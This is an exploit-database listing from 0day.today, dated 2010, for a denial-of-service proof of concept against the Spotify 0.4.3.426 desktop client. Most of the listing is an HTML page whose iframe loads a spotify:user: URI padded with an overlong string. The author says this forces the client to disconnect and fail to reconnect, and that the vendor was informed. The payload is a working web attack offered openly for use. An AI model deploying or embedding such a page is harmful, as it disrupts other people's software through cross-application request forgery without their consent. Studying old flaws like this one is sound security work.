[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Spotify Version: 0.4.3.426 Disconnect Exploit

Author
pimpim
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13571
Category
dos / poc
Date add
05-08-2010
Platform
windows
# Exploit Title: Spotify Disconnect Exploit
# Author: pimpim - pyscripter94@gmail.com
# Software Link: http://www.spotify.com/se/download/windows/
# Version: 0.4.3.426
# Platform / Tested on: Windows 7, Windows XP, Ubuntu linux (using wine)
# Category: dos
# Description: If a spotify:user:x search is done, and x is more than 256 characters long, spotify will be 
  disconnected, and will also fail reconnecting. 
  The exploit can be triggered by a browser through Cross Application Request Forgery.
  This has been reported to the vendor.
# Code :
<html>
	<head>
	</head>
	<body>
		Spotify Disconnect Exploit by pimpim
		<iframe src="spotify:user:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"></iframe>
	</body>
</html>



#  0day.today [2024-12-24]  #